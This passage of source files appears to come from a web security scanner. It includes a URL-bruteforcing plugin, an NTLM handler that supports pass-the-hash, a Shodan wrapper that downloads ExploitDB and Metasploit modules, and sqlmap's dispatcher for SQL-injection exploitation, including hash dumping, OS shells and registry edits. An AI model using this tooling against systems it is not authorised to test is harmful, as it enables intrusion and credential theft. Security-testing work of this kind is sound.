if info.parsed_url.extension[1:] in ('css', 'js', 'jpeg', 'jpg', 'png', 'gif', 'svg') or not m_url_parts.extension:
Logger.log_more_verbose("Skipping URL: %s" % m_url)
return
Logger.log_more_verbose("Bruteforcing URL: %s" % m_url)
#
# Load wordlist for changing directories
#
# COMMON
m_urls = make_url_changing_folder_name(m_url_parts)
# Generates the error page
m_error_response = get_error_page(m_url)
# Create the matching analyzer
try:
m_store_info = MatchingAnalyzer(m_error_response.raw_data, min_ratio=0.65)
except ValueError, e:
Logger.log_error("There is not information for analyze when creating the matcher: '%s'" % e)
return
# Create the partial funs
_f = partial(process_url,
severity_vectors['directories'],
get_http_method(m_url),
m_store_info,
self.update_status,
len(m_urls))
# Process the URLs
for i, l_url in enumerate(m_urls):
_f((i, l_url))
# Generate and return the results.
return generate_results(m_store_info.unique_texts)
#------------------------------------------------------------------------------
def process_url(risk_level, method, matcher, updater_func, total_urls, url):
"""
Checks if a URL exists.
:param risk_level: risk level of the tested URL, if discovered.
:type risk_level: int
:param method: string with HTTP method used.
:type method: str
:param matcher: instance of MatchingAnalyzer object.
:type matcher: `MatchingAnalyzer`
:param updater_func: update_status function to send updates
:type updater_func: update_status
:param total_urls: total number of URLs to process globally.
:type total_urls: int
:param url: a tuple with data: (index, the URL to process)
:type url: tuple(int, str)
"""
i, url = url
updater_func((float(i) * 100.0) / float(total_urls))
# Logger.log_more_verbose("Trying to discover URL %s" % url)
# Get URL
p = None
try:
p = HTTP.get_url(url, use_cache=False, method=method)
if p:
discard_data(p)
except Exception, e:
Logger.log_error_more_verbose("Error while processing: '%s': %s" % (url, str(e)))
# Check if the URL is acceptable by comparing
# the result content.
#
# If the matching level between the error page
# and this URL is greater than 52%, then it's
# the same URL and must be discarded.
#
if p and p.status == "200":
# If the method used to get the URL was HEAD, fetch the complete URL with GET
if method != "GET":
try:
p = HTTP.get_url(url, use_cache=False, method="GET")
if p:
discard_data(p)
except Exception, e:
Logger.log_error_more_verbose("Error while processing: '%s': %s" % (url, str(e)))
# Submit for analysis and log the info if it is accepted
if matcher.analyze(p.raw_response, url=url, risk=risk_level):
Logger.log_more_verbose("Discovered partial url: '%s'" % url)
#------------------------------------------------------------------------------
#
# Aux functions
#
#------------------------------------------------------------------------------
def load_wordlists(wordlists):
"""
Load the wordlists whose names are passed as parameters.
This function receives a list of wordlist names, as defined in the plugin
configuration file, and returns a dict with the loaded wordlists.
:param wordlists: list of wordlist names
:type wordlists: list
:returns: A dict with wordlists
:rtype: dict
"""
m_tmp_wordlist = {}
# Get wordlist to load
for l_w in wordlists:
for wordlist_family, l_wordlists in Config.plugin_extra_config.iteritems():
if wordlist_family.lower() in l_w.lower():
m_tmp_wordlist[l_w] = l_wordlists
# Load the wordlist
m_return = {}
for k, w_paths in m_tmp_wordlist.iteritems():
m_return[k] = [WordListLoader.get_wordlist_as_list(w) for w in w_paths]
return m_return
#------------------------------------------------------------------------------
def get_http_method(url):
"""
This function determines whether the HEAD method is usable. To do that, it compares two responses:
- One obtained with the GET method
- One obtained with the HEAD method
If the headers are more than 90% similar, the responses are considered the same and the HEAD method is not used.
"""
m_head_response = HTTP.get_url(url, method="HEAD") # FIXME handle exceptions!
discard_data(m_head_response)
m_get_response = HTTP.get_url(url) # FIXME handle exceptions!
discard_data(m_get_response)
# Check if the HEAD response differs from the GET response, to ensure that the results are valid
return "HEAD" if HTTP_response_headers_analyzer(m_head_response.headers, m_get_response.headers) < 0.90 else "GET"
#------------------------------------------------------------------------------
# HTTP response analyzer.
def HTTP_response_headers_analyzer(response_header_1, response_header_2):
"""
Does an HTTP comparison to determine whether two HTTP responses match the same
content, using only the headers (the body is not needed). To do that, some
volatile HTTP headers (like Date or cache info) are removed first.
Returns a similarity value between 0 and 1:
- If response_header_1 is very similar to response_header_2, the value will be close to 1.
- If response_header_1 is very different from response_header_2, the value will be close to 0.
:param response_header_1: text with http response headers.
:type response_header_1: http headers
:param response_header_2: text with http response headers.
:type response_header_2: http headers
"""
m_invalid_headers = [
"Date",
"Expires",
"Last-Modified",
]
m_res1 = ''.join([ "%s:%s" % (k,v) for k,v in response_header_1.iteritems() if k not in m_invalid_headers ])
m_res2 = ''.join([ "%s:%s" % (k,v) for k,v in response_header_2.iteritems() if k not in m_invalid_headers ])
return get_diff_ratio(m_res1, m_res2)
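# Illustrative sketch (not part of GoLismero): get_diff_ratio() above comes
# from golismero.api.text.matching_analyzer; a similar similarity score can be
# approximated with the standard library, which is what this stand-in does.
# The header values below are made up.
def _example_header_similarity():
    from difflib import SequenceMatcher
    skip = ("Date", "Expires", "Last-Modified")
    h1 = {"Server": "Apache", "Content-Type": "text/html", "Date": "Mon"}
    h2 = {"Server": "Apache", "Content-Type": "text/html", "Date": "Tue"}
    flat1 = "".join("%s:%s" % (k, v) for k, v in sorted(h1.items()) if k not in skip)
    flat2 = "".join("%s:%s" % (k, v) for k, v in sorted(h2.items()) if k not in skip)
    return SequenceMatcher(None, flat1, flat2).ratio()   # 1.0 here: only Date differs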
#------------------------------------------------------------------------------
def generate_results(unique_texts):
"""
Generates a list of results from the unique matches found by the matching analyzer.
:param unique_texts: list of unique matches, each carrying a URL and a risk level.
:type unique_texts: list
:return: a list of URL/UrlDisclosure objects.
:rtype: list(URL|UrlDisclosure)
"""
# Analyze results
m_results = []
m_results_append = m_results.append
for l_match in unique_texts:
#
# Set disclosure vulnerability
l_url = URL(l_match.url)
l_vuln = UrlDisclosure(l_url)
# Set impact
l_vuln.risk = l_match.risk
# Store
m_results_append(l_url)
m_results_append(l_vuln)
return m_results
#------------------------------------------------------------------------------
#
# Mutation functions
#
#------------------------------------------------------------------------------
def make_url_with_prefixes(wordlist, url_parts):
"""
Creates a set of URLs with prefixes.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_new = url_parts.copy() # Works with a copy
m_return = set()
m_return_add = m_return.add
m_filename = m_new.filename
for l_suffix in wordlist:
# Format: <prefix>_index.php
m_new.filename = "%s_%s" % (l_suffix, m_filename)
m_return_add(m_new.url)
# Format: <prefix>index.php
m_new.filename = "%s%s" % (l_suffix, m_filename)
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_with_suffixes(wordlist, url_parts):
"""
Creates a set of URLs with suffixes.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_new = url_parts.copy() # Works with a copy
m_return = set()
m_return_add = m_return.add
m_filename = m_new.filename
for l_suffix in wordlist:
# Format: index1.php
m_new.filename = m_filename + str(l_suffix)
m_return_add(m_new.url)
# Format: index_1.php
m_new.filename = "%s_%s" % (m_filename, l_suffix)
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_mutate_filename(url_parts):
"""
Creates a set of URLs with mutated filenames.
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
# Change extension to upper case
m_new = url_parts.copy()
m_new.all_extensions = m_new.all_extensions.upper()
m_return = set()
m_return_add = m_return.add
m_return_add(m_new.url)
# Adding numeric ends of filename
m_new = url_parts.copy()
filename = m_new.filename
for n in xrange(5):
# Format: index1.php
m_new.filename = filename + str(n)
m_return_add(m_new.url)
# Format: index_1.php
m_new.filename = "%s_%s" % (filename, str(n))
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_changing_folder_name(url_parts):
"""
Creates a set of URLs by appending numbers to the last folder name.
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:returns: a set with urls.
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
m_directory = m_new.directory
if len(m_directory.split("/")) > 1:
for n in xrange(20):
m_new.directory = "%s%s" % (m_directory, str(n))
m_return_add(m_new.url)
return m_return
else:
return set()
#------------------------------------------------------------------------------
def make_url_with_files_or_folder(wordlist, url_parts):
"""
Creates a set of URLs with guessed files and subfolders.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
m_wordlist_predictable = wordlist['predictable_files']
if not m_wordlist_predictable:
m_wordlist_predictable = set()
m_wordlist_suffix = wordlist['suffixes']
if not m_wordlist_suffix:
m_wordlist_suffix = set()
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
for l_wordlist in m_wordlist_predictable:
# For errors
if not l_wordlist:
Logger.log_error("Can't load wordlist for category: 'predictable_files'.")
continue
for l_path in l_wordlist:
# Skip wordlist comment lines
if l_path.startswith("#"):
continue
# Fix l_path
l_fixed_path = l_path[1:] if l_path.startswith("/") else l_path
m_new.filename = l_fixed_path
m_return_add(m_new.url)
# For locations where application source code may be exposed, like:
# www.site.com/folder/app1/ -> www.site.com/folder/app1.war
#
m_new = url_parts.copy()
m_path = m_new.directory
if m_path.endswith('/'):
m_path = m_path[:-1]
for l_wordlist in m_wordlist_suffix:
# For errors
if not l_wordlist:
Logger.log_error("Can't load wordlist for category: 'suffixes'.")
continue
for l_suffix in l_wordlist:
m_new.path = m_path + l_suffix
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def make_url_changing_extensions(wordlist, url_parts):
"""
Creates a set of URLs with alternative file extensions.
:param wordlist: Wordlist iterator.
:type wordlist: WordList
:param url_parts: Parsed URL to mutate.
:type url_parts: ParsedURL
:return: a set with the URLs
:rtype: set
"""
if not isinstance(url_parts, ParsedURL):
raise TypeError("Expected ParsedURL, got %r instead" % type(url_parts))
if not wordlist:
raise ValueError("Internal error!")
# Making predictables
m_new = url_parts.copy()
m_return = set()
m_return_add = m_return.add
for l_suffix in wordlist:
m_new.all_extensions = l_suffix
m_return_add(m_new.url)
return m_return
#------------------------------------------------------------------------------
def is_folder_url(url_parts):
"""
Determine if the given URL points to a folder or a file:
if URL looks like:
- www.site.com/
- www.site.com
then ==> Return True
if URL looks like:
- www.site.com/index.php
- www.site.com/index.php?id=1&name=bb
- www.site.com/index.php/id=1&name=bb
then ==> Return False
:param url_parts: Parsed URL to test.
:type url_parts: ParsedURL
:return: True if it's a folder, False otherwise.
:rtype: bool
"""
return url_parts.path.endswith('/') and not url_parts.query_char == '/'
#------------------------------------------------------------------------------
def get_list_from_wordlist(wordlist):
"""
Load the content of the wordlist and return a set with the content.
:param wordlist: wordlist name.
:type wordlist: str
:return: a set with the results.
:rtype: set
"""
try:
m_commom_wordlists = set()
for v in Config.plugin_extra_config[wordlist].itervalues():
m_commom_wordlists.update(WordListLoader.get_wordlist_as_list(v))
return m_commom_wordlists
except KeyError,e:
Logger.log_error_more_verbose(str(e))
return set()
```
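To make the header-comparison logic in `HTTP_response_headers_analyzer()` easier to follow, here is a minimal, self-contained sketch of the same idea. It assumes `get_diff_ratio()` behaves like a difflib-style similarity ratio (0.0 = completely different, 1.0 = identical); the real GoLismero helper may differ in detail, and the header values below are invented.
```python
from difflib import SequenceMatcher

# Headers that change between requests and would skew the comparison.
VOLATILE_HEADERS = ("Date", "Expires", "Last-Modified")

def headers_similarity(headers_1, headers_2):
    """Return a 0..1 similarity ratio between two header dicts."""
    flat_1 = ''.join("%s:%s" % (k, v) for k, v in sorted(headers_1.items())
                     if k not in VOLATILE_HEADERS)
    flat_2 = ''.join("%s:%s" % (k, v) for k, v in sorted(headers_2.items())
                     if k not in VOLATILE_HEADERS)
    return SequenceMatcher(None, flat_1, flat_2).ratio()

if __name__ == "__main__":
    get_headers = {"Server": "nginx", "Content-Type": "text/html", "Date": "Mon"}
    head_headers = {"Server": "nginx", "Content-Type": "text/html", "Date": "Tue"}
    # A ratio >= 0.90 is what makes get_http_method() fall back to GET.
    print(headers_similarity(get_headers, head_headers))
```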
#### File: thirdparty_libs/requests_ntlm/requests_ntlm.py
```python
from requests.auth import AuthBase
from requests.adapters import HTTPAdapter
from .ntlm import ntlm
class HttpNtlmAuth(AuthBase):
"""HTTP NTLM Authentication Handler for Requests. Supports pass-the-hash."""
def __init__(self, username, password):
"""
:username - Username in 'domain\\username' format
:password - Password or hash in "<PASSWORD>:<PASSWORD>" format.
"""
if ntlm is None:
raise Exception("NTLM libraries unavailable")
#parse the username
user_parts = username.split('\\', 1)
self.domain = user_parts[0].upper()
self.username = user_parts[1]
self.password = password
self.adapter = HTTPAdapter()
def retry_using_http_NTLM_auth(self, auth_header_field, auth_header, response):
"""Attempts to authenticate using HTTP NTLM challenge/response"""
if auth_header in response.request.headers:
return response
request = response.request
# initial auth header with username. will result in challenge
auth = 'NTLM %s' % ntlm.create_NTLM_NEGOTIATE_MESSAGE("%s\\%s" % (self.domain,self.username))
request.headers[auth_header] = auth
# we must keep the connection because NTLM authenticates the connection, not single requests
request.headers["Connection"] = "Keep-Alive"
response2 = self.adapter.send(request)
# this is important for some web applications that store authentication-related info in cookies (it took a long time to figure out)
if response2.headers.get('set-cookie'):
request.headers['Cookie'] = response2.headers.get('set-cookie')
# get the challenge
auth_header_value = response2.headers[auth_header_field]
ServerChallenge, NegotiateFlags = ntlm.parse_NTLM_CHALLENGE_MESSAGE(auth_header_value[5:])
# build response
auth = 'NTLM %s' % ntlm.create_NTLM_AUTHENTICATE_MESSAGE(ServerChallenge, self.username, self.domain, self.password, NegotiateFlags)
request.headers[auth_header] = auth
request.headers["Connection"] = "Close"
response = self.adapter.send(request)
return response
def response_hook(self,r):
if r.status_code == 401 and 'ntlm' in r.headers.get('www-authenticate','').lower():
return self.retry_using_http_NTLM_auth('www-authenticate', 'Authorization', r)
if r.status_code == 407 and 'ntlm' in r.headers.get('proxy-authenticate','').lower():
return self.retry_using_http_NTLM_auth('proxy-authenticate', 'Proxy-authorization', r)
return r
def __call__(self,r):
r.register_hook('response', self.response_hook)
return r
```
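The handler above is meant to be plugged into the `requests` auth machinery through its `__call__`/response-hook pair. A minimal usage sketch, assuming the module is importable as `requests_ntlm` and that the host, domain and credentials below are placeholders:
```python
import requests
from requests_ntlm import HttpNtlmAuth  # import path depends on how the package is installed

session = requests.Session()
# Username must be in 'DOMAIN\\user' format, as required by __init__ above.
session.auth = HttpNtlmAuth('EXAMPLE\\someuser', 'somepassword')

response = session.get('https://intranet.example.com/protected')
print(response.status_code)
```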
#### File: thirdparty_libs/shodan/api.py
```python
try:
from json import dumps, loads
except ImportError:
from simplejson import dumps, loads
try:
# Python 2
from urllib2 import urlopen
from urllib import urlencode
except ImportError:
# Python 3
from urllib.request import urlopen
from urllib.parse import urlencode
__all__ = ['WebAPI']
class WebAPIError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return self.value
class WebAPI:
"""Wrapper around the SHODAN webservices API"""
class Exploits:
def __init__(self, parent):
self.parent = parent
def search(self, query, sources=[], cve=None, osvdb=None, msb=None, bid=None):
"""Search the entire Shodan Exploits archive using the same query syntax
as the website.
Arguments:
query -- exploit search query; same syntax as website
Optional arguments:
sources -- metasploit, cve, osvdb, exploitdb, or packetstorm
cve -- CVE identifier (ex. 2010-0432)
osvdb -- OSVDB identifier (ex. 11666)
msb -- Microsoft Security Bulletin ID (ex. MS05-030)
bid -- Bugtraq identifier (ex. 13951)
"""
if sources:
query += ' source:' + ','.join(sources)
if cve:
query += ' cve:%s' % (str(cve).strip())
if osvdb:
query += ' osvdb:%s' % (str(osvdb).strip())
if msb:
query += ' msb:%s' % (str(msb).strip())
if bid:
query += ' bid:%s' % (str(bid).strip())
return self.parent._request('search_exploits', {'q': query})
class ExploitDb:
def __init__(self, parent):
self.parent = parent
def download(self, id):
"""Download the exploit code from the ExploitDB archive.
Arguments:
id -- ID of the ExploitDB entry
Returns:
A dictionary with the following fields:
filename -- Name of the file
content-type -- Mimetype
data -- Contents of the file
"""
return self.parent._request('exploitdb/download', {'id': id})
def search(self, query, **kwargs):
"""Search the ExploitDB archive.
Arguments:
query -- Search terms
Optional arguments:
author -- Name of the exploit submitter
platform -- Target platform (e.g. windows, linux, hardware etc.)
port -- Service port number
type -- Any, dos, local, papers, remote, shellcode and webapps
Returns:
A dictionary with 2 main items: matches (list) and total (int).
Each item in 'matches' is a dictionary with the following elements:
id
author
date
description
platform
port
type
"""
return self.parent._request('exploitdb/search', dict(q=query, **kwargs))
class Msf:
def __init__(self, parent):
self.parent = parent
def download(self, id):
"""Download a metasploit module given the fullname (id) of it.
Arguments:
id -- fullname of the module (ex. auxiliary/admin/backupexec/dump)
Returns:
A dictionary with the following fields:
filename -- Name of the file
content-type -- Mimetype
data -- File content
"""
return self.parent._request('msf/download', {'id': id})
def search(self, query, **kwargs):
"""Search for a Metasploit module.
"""
return self.parent._request('msf/search', dict(q=query, **kwargs))
def __init__(self, key):
"""Initializes the API object.
Arguments:
key -- your API key
"""
self.api_key = key
self.base_url = 'http://www.shodanhq.com/api/'
self.exploits = self.Exploits(self)
self.exploitdb = self.ExploitDb(self)
self.msf = self.Msf(self)
def _request(self, function, params):
"""General-purpose function to create web requests to SHODAN.
Arguments:
function -- name of the function you want to execute
params -- dictionary of parameters for the function
Returns
A JSON string containing the function's results.
"""
# Add the API key parameter automatically
params['key'] = self.api_key
# Send the request
data = urlopen(self.base_url + function + '?' + urlencode(params)).read().decode('utf-8')
# Parse the text into JSON
data = loads(data)
# Raise an exception if an error occurred
if data.get('error', None):
raise WebAPIError(data['error'])
# Return the data
return data
def count(self, query):
"""Returns the total number of search results for the query.
"""
return self._request('count', {'q': query})
def locations(self, query):
"""Return a break-down of all the countries and cities that the results for
the given search are located in.
"""
return self._request('locations', {'q': query})
def fingerprint(self, banner):
"""Determine the software based on the banner.
Arguments:
banner - HTTP banner
Returns:
A list of software that matched the given banner.
"""
return self._request('fingerprint', {'banner': banner})
def host(self, ip):
"""Get all available information on an IP.
Arguments:
ip -- IP of the computer
Returns:
All available information SHODAN has on the given IP,
subject to API key restrictions.
"""
return self._request('host', {'ip': ip})
def info(self):
"""Returns information about the current API key, such as a list of add-ons
and other features that are enabled for the current user's API plan.
"""
return self._request('info', {})
def search(self, query, page=1, limit=None, offset=None):
"""Search the SHODAN database.
Arguments:
query -- search query; identical syntax to the website
Optional arguments:
page -- page number of the search results
limit -- number of results to return
offset -- search offset to begin getting results from
Returns:
A dictionary with 3 main items: matches, countries and total.
Visit the website for more detailed information.
"""
args = {
'q': query,
'p': page,
}
if limit:
args['l'] = limit
if offset:
args['o'] = offset
return self._request('search', args)
```
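A short usage sketch for the `WebAPI` wrapper above. The API key is a placeholder, the import path is an assumption about how the `thirdparty_libs` package is laid out, and the call needs network access to the legacy shodanhq.com endpoint:
```python
from shodan.api import WebAPI, WebAPIError  # hypothetical import path

api = WebAPI("YOUR_API_KEY")
try:
    results = api.search("apache")
    # search() returns a dict with 'matches', 'countries' and 'total' keys.
    print("Total results: %s" % results.get("total"))
    for match in results.get("matches", [])[:3]:
        print(match)
except WebAPIError as err:
    print("API error: %s" % err)
```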
#### File: thirdparty_libs/shodan/export.py
```python
import sys
from datetime import datetime
from xml.sax import make_parser, handler
# Type conversion helper functions
def parse_date(args):
return datetime.strptime(args, '%d.%m.%Y')
class ExportSaxParser(handler.ContentHandler):
"""Parses Shodan's export XML file and executes the callback for each
entry.
"""
# Callbacks
entry_cb = None
# Keep track of where we're at
_in_host = False
_in_data = False
_host = None
_data = u''
# Conversion schemas
_host_attr_schema = {
'port': int,
'updated': parse_date,
}
def __init__(self, entry_cb=None):
# Define the callbacks
self.entry_cb = entry_cb
# ContentHandler methods
def startElement(self, name, attrs):
if name =='host':
# Extract all the attribute information
self._host = {}
for (name, value) in attrs.items():
# Convert the field to a native type if it's defined in the schema
self._host[name] = self._host_attr_schema.get(name, lambda x: x)(value)
# Update the state machine
self._in_host = True
elif name == 'data':
self._in_data = True
self._data = u''
def endElement(self, name):
if name == 'host':
# Execute the callback
self.entry_cb(self._host)
# Update the state machine
self._in_host = False
elif name == 'data':
self._host['data'] = self._data
self._in_data = False
def characters(self, content):
if self._in_data:
self._data += content
class ExportParser(object):
entry_cb = None
def __init__(self, entry_cb=None):
self.entry_cb = entry_cb
def parse(self, filename):
parser = make_parser()
parser.setContentHandler(ExportSaxParser(self.entry_cb))
parser.parse(filename)
if __name__ == '__main__':
def test_cb(entry):
print entry
import sys
parser = ExportParser(test_cb)
parser.parse(sys.argv[1])
```
#### File: thirdparty_libs/snakemq/poll.py
```python
import select
import time
#########################################################################
if not hasattr(select, "epoll"):
select.EPOLLIN = 1
select.EPOLLOUT = 4
select.EPOLLERR = 8
select.EPOLLHUP = 16
#########################################################################
class SelectPoll(object):
def __init__(self):
self.fds = {}
def register(self, fd, eventmask=select.EPOLLIN | select.EPOLLOUT):
self.fds[fd] = eventmask
def unregister(self, fd):
try:
del self.fds[fd]
except KeyError:
pass
def modify(self, fd, eventmask):
self.fds[fd] = eventmask
@staticmethod
def _socket_to_fd(obj):
"""
convert a socket-like object to a file descriptor
"""
if hasattr(obj, "fileno"):
fd = obj.fileno()
else:
fd = obj
return fd
def poll(self, timeout):
"""
@param timeout: seconds
"""
if len(self.fds) == 0:
time.sleep(timeout)
return []
rlist = []
wlist = []
xlist = []
for fd, mask in self.fds.items():
fd = self._socket_to_fd(fd)
if mask & select.EPOLLIN:
rlist.append(fd)
if mask & select.EPOLLOUT:
wlist.append(fd)
xlist.append(fd)
rlist, wlist, xlist = select.select(rlist, wlist, xlist, timeout)
res = {}
for fd in rlist:
res[fd] = res.get(fd, 0) | select.EPOLLIN
for fd in wlist:
res[fd] = res.get(fd, 0) | select.EPOLLOUT
for fd in xlist:
res[fd] = res.get(fd, 0) | select.EPOLLERR
return res.items()
#########################################################################
if hasattr(select, "epoll"):
poll = select.epoll
else:
poll = SelectPoll
```
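The `SelectPoll` fallback mirrors the `select.epoll` interface, so callers can drive either object the same way. A small sketch of that usage (the import path and the throwaway listening socket are illustrative only):
```python
import select
import socket
from snakemq.poll import SelectPoll  # import path is an assumption

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("127.0.0.1", 0))
server.listen(1)

poller = SelectPoll()
poller.register(server, select.EPOLLIN)  # watch for readability only
events = poller.poll(0.1)                # timeout in seconds
for fd, mask in events:
    if mask & select.EPOLLIN:
        print("fd %d is ready for reading" % fd)
server.close()
```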
#### File: extra/beep/beep.py
```python
import os
import subprocess
import sys
import wave
BEEP_WAV_FILENAME = os.path.join(os.path.dirname(__file__), "beep.wav")
def beep():
try:
if subprocess.mswindows:
_win_wav_play(BEEP_WAV_FILENAME)
elif sys.platform == "darwin":
_mac_beep()
elif sys.platform == "linux2":
_linux_wav_play(BEEP_WAV_FILENAME)
else:
_speaker_beep()
except:
_speaker_beep()
def _speaker_beep():
sys.stdout.write('\a') # doesn't work on modern Linux systems
try:
sys.stdout.flush()
except IOError:
pass
def _mac_beep():
import Carbon.Snd
Carbon.Snd.SysBeep(1)
def _win_wav_play(filename):
import winsound
winsound.PlaySound(filename, winsound.SND_FILENAME)
def _linux_wav_play(filename):
import ctypes
PA_STREAM_PLAYBACK = 1
PA_SAMPLE_S16LE = 3
BUFFSIZE = 1024
class struct_pa_sample_spec(ctypes.Structure):
_fields_ = [("format", ctypes.c_int), ("rate", ctypes.c_uint32), ("channels", ctypes.c_uint8)]
pa = ctypes.cdll.LoadLibrary("libpulse-simple.so.0")
wave_file = wave.open(filename, "rb")
pa_sample_spec = struct_pa_sample_spec()
pa_sample_spec.rate = wave_file.getframerate()
pa_sample_spec.channels = wave_file.getnchannels()
pa_sample_spec.format = PA_SAMPLE_S16LE
error = ctypes.c_int(0)
pa_stream = pa.pa_simple_new(None, filename, PA_STREAM_PLAYBACK, None, "playback", ctypes.byref(pa_sample_spec), None, None, ctypes.byref(error))
if not pa_stream:
raise Exception("Could not create pulse audio stream: %s" % pa.strerror(ctypes.byref(error)))
while True:
latency = pa.pa_simple_get_latency(pa_stream, ctypes.byref(error))
if latency == -1:
raise Exception("Getting latency failed")
buf = wave_file.readframes(BUFFSIZE)
if not buf:
break
if pa.pa_simple_write(pa_stream, buf, len(buf), ctypes.byref(error)):
raise Exception("Could not play file")
wave_file.close()
if pa.pa_simple_drain(pa_stream, ctypes.byref(error)):
raise Exception("Could not simple drain")
pa.pa_simple_free(pa_stream)
if __name__ == "__main__":
beep()
```
#### File: lib/controller/action.py
```python
from lib.controller.handler import setHandler
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import CONTENT_TYPE
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.settings import SUPPORTED_DBMS
from lib.techniques.brute.use import columnExists
from lib.techniques.brute.use import tableExists
def action():
"""
This function exploit the SQL injection on the affected
URL parameter and extract requested data from the
back-end database management system or operating system
if possible
"""
# First of all we have to identify the back-end database management
# system to be able to go ahead with the injection
setHandler()
if not Backend.getDbms() or not conf.dbmsHandler:
htmlParsed = Format.getErrorParsedDBMSes()
errMsg = "sqlmap was not able to fingerprint the "
errMsg += "back-end database management system"
if htmlParsed:
errMsg += ", but from the HTML error page it was "
errMsg += "possible to determinate that the "
errMsg += "back-end DBMS is %s" % htmlParsed
if htmlParsed and htmlParsed.lower() in SUPPORTED_DBMS:
errMsg += ". Do not specify the back-end DBMS manually, "
errMsg += "sqlmap will fingerprint the DBMS for you"
elif kb.nullConnection:
errMsg += ". You can try to rerun without using optimization "
errMsg += "switch '%s'" % ("-o" if conf.optimize else "--null-connection")
else:
errMsg += ". Support for this DBMS will be implemented at "
errMsg += "some point"
raise SqlmapUnsupportedDBMSException(errMsg)
conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
# Enumeration options
if conf.getBanner:
conf.dumper.banner(conf.dbmsHandler.getBanner())
if conf.getCurrentUser:
conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
if conf.getCurrentDb:
conf.dumper.currentDb(conf.dbmsHandler.getCurrentDb())
if conf.getHostname:
conf.dumper.hostname(conf.dbmsHandler.getHostname())
if conf.isDba:
conf.dumper.dba(conf.dbmsHandler.isDba())
if conf.getUsers:
conf.dumper.users(conf.dbmsHandler.getUsers())
if conf.getPasswordHashes:
try:
conf.dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getPrivileges:
try:
conf.dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getRoles:
try:
conf.dumper.userSettings("database management system users roles",
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
raise
if conf.getDbs:
conf.dumper.dbs(conf.dbmsHandler.getDbs())
if conf.getTables:
conf.dumper.dbTables(conf.dbmsHandler.getTables())
if conf.commonTables:
conf.dumper.dbTables(tableExists(paths.COMMON_TABLES))
if conf.getSchema:
conf.dumper.dbTableColumns(conf.dbmsHandler.getSchema(), CONTENT_TYPE.SCHEMA)
if conf.getColumns:
conf.dumper.dbTableColumns(conf.dbmsHandler.getColumns(), CONTENT_TYPE.COLUMNS)
if conf.getCount:
conf.dumper.dbTablesCount(conf.dbmsHandler.getCount())
if conf.commonColumns:
conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS))
if conf.dumpTable:
conf.dbmsHandler.dumpTable()
if conf.dumpAll:
conf.dbmsHandler.dumpAll()
if conf.search:
conf.dbmsHandler.search()
if conf.query:
conf.dumper.query(conf.query, conf.dbmsHandler.sqlQuery(conf.query))
if conf.sqlShell:
conf.dbmsHandler.sqlShell()
if conf.sqlFile:
conf.dbmsHandler.sqlFile()
# User-defined function options
if conf.udfInject:
conf.dbmsHandler.udfInjectCustom()
# File system options
if conf.rFile:
conf.dumper.rFile(conf.dbmsHandler.readFile(conf.rFile))
if conf.wFile:
conf.dbmsHandler.writeFile(conf.wFile, conf.dFile, conf.wFileType)
# Operating system options
if conf.osCmd:
conf.dbmsHandler.osCmd()
if conf.osShell:
conf.dbmsHandler.osShell()
if conf.osPwn:
conf.dbmsHandler.osPwn()
if conf.osSmb:
conf.dbmsHandler.osSmb()
if conf.osBof:
conf.dbmsHandler.osBof()
# Windows registry options
if conf.regRead:
conf.dumper.registerValue(conf.dbmsHandler.regRead())
if conf.regAdd:
conf.dbmsHandler.regAdd()
if conf.regDel:
conf.dbmsHandler.regDel()
# Miscellaneous options
if conf.cleanup:
conf.dbmsHandler.cleanup()
if conf.direct:
conf.dbmsConnector.close()
```
#### File: lib/core/convert.py
```python
import json
import pickle
import sys
from lib.core.settings import IS_WIN
from lib.core.settings import UNICODE_ENCODING
def base64decode(value):
"""
Decodes string value from Base64 to plain format
>>> base64decode('Zm9vYmFy')
'foobar'
"""
return value.decode("base64")
def base64encode(value):
"""
